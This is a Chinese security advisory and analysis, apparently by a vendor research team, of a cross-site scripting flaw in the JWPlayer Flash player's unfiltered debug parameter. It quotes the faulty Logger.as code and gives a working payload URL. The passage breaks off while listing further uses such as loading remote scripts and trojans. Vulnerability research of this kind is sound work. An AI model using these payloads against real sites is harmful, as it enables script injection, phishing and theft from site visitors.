JWPlayer跨站脚本攻击分析跨站脚本攻击分析.PDF

JWPlayer 跨站脚本攻击分析跨站脚本攻击分析 跨站脚本攻击跨站脚本攻击分析分析 启明星辰启明星辰 研发中心安全研究团队研发中心安全研究团队 启明星辰启明星辰 研发中心安全研究团队研发中心安全研究团队 缺陷编号： WooYun-2012-07166 漏洞标题： JWPlayer Xss 0day [Flash 编程安全问题] 相关厂商： LongTail Video 漏洞作者： gainover 漏洞类型： xss 跨站脚本攻击 危害等级： 高 相关链接： /bugs/wooyun-2010-07166 漏洞详情： JWPlayer 是一款国外的web 播放器，目前使用该播放器的网站已达百万，国内大型网站如 去哪儿网，百度，新浪，猫扑等网站均使用该播放器，并且经过验证均存在此漏洞。 漏洞证明截图： 漏洞分析： 产生该漏洞产生的原因是flash 版本播放器代码存在问题，没有对debug 变量做任何过滤与 检查而直接运行。 检测源码版本为5.9 缺陷文件com/longtailvideo/jwplayer/utils/Logger.as 缺陷代码段： private static function send(text:String):void { var debug:String = _config ? _config.debug : TRACE; //初始化变量debug switch (debug) { // 比较debug case ARTHROPOD: try { CONNECTION.send(CONNECTION_NAME, debug, CDC309AF, text, 0xCCCCCC); } catch(e:Error) { trace(text); } break; case CONSOLE: if (ExternalInterface.available) { ExternalInterface.call(console.log, text); } break; case TRACE: trace(text); break; case NONE: break; default: //运行到此处执行 if (ExternalInterface.available) { ExternalInterface.call(_config.debug, text); //直接使用_config.debug 变量 } break; } } ExternalInterface.call() 方法执行容器应用程序中的代码, 由于容器为 HTML 页，此方法将调 用具有指定名称的 JavaScript 函数,而 config.debug 变量没有进行任何过滤，直接被用于第 一个参数，从而当我们构造player.swf?debug=(function(){alert(xxx)})() 这样的url 后，内置 的javascript 函数alert 将会执行。 由此可见，我们可以通过各类javascript 函数来伪造url ，实现跨站，钓鱼等攻击。 例如： 1.使用location.href 等实现请求其他js 脚本并执行（高级xss ，下载木马，溢出攻击） player.swf?debug=(function()%7Blocation.href%3Djavascript%